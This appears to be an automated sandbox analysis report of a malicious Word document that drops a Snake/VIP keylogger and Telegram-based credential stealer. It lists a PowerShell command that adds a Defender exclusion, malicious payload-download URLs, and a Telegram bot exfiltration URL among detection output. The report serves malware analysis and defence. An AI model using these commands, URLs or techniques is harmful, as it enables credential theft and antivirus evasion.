Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 1D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 21B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 3E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 5740000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 6740000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 6880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 7880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 3D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 23B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 780000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 600000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3765 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3545 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Window / User API: threadDelayed 9196 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Window / User API: threadDelayed 608 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3792 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 3852 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2240 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4060 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 2992 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844 Thread sleep count: 9196 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844 Thread sleep count: 608 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory written: C:\Users\user\AppData\Roaming\millitingacy20306.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Queries volume information: C:\Users\user\AppData\Roaming\millitingacy20306.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Queries volume information: C:\Users\user\AppData\Roaming\millitingacy20306.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520577 Sample: 0225139776.docx.doc Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 25 other signatures 2->60 8 WINWORD.EXE 314 54 2->8         started        process3 dnsIp4 44 66.63.187.123, 49163, 49164, 49165 ASN-QUADRANET-GLOBALUS United States 8->44 26 C:\Users\user\...\txt on 66.63.187.123.url, MS 8->26 dropped 28 C:\Users\user\AppData\...\millizxc.doc.url, MS 8->28 dropped 30 ~WRF{15013EC6-ED12...F-9B4A7E95BCBA}.tmp, Composite 8->30 dropped 32 2 other malicious files 8->32 dropped 72 Microsoft Office launches external ms-search protocol handler (WebDAV) 8->72 74 Office viewer loads remote template 8->74 76 Microsoft Office drops suspicious files 8->76 13 EQNEDT32.EXE 11 8->13         started        file5 signatures6 process7 file8 34 C:\Users\user\...\millitingacy20306.exe, PE32 13->34 dropped 36 C:\Users\user\...\H363BpKqz0MdVd7[1].exe, PE32 13->36 dropped 78 Office equation editor establishes network connection 13->78 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->80 17 millitingacy20306.exe 3 13->17         started        signatures9 process10 signatures11 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 millitingacy20306.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process12 dnsIp13 38 reallyfreegeoip.org 20->38 40 api.telegram.org 20->40 42 8 other IPs or domains 20->42 62 Installs new ROOT certificates 20->62 64 Tries to steal Mail credentials (via file / registry access) 20->64 66 Tries to harvest and steal browser information (history, passwords, etc) 20->66 signatures14 68 Tries to detect the country of the analysis system (by using the IP) 38->68 70 Uses the Telegram API (likely for C&C communication) 40->70
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 unknown European Union
13335 CLOUDFLARENETUS false
66.63.187.123
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true
193.122.6.168
 unknown United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 unknown United States
31898 ORACLE-BMC-31898US false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
132.226.247.73
 unknown United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://66.63.187.123/txt/H363BpKqz0MdVd7.exe true
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    http://66.63.187.123/txt/millizxc.doc true
      		unknown
      https://reallyfreegeoip.org/xml/8.46.123.33 false
      • URL Reputation: safe
      		 unknown
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		unknown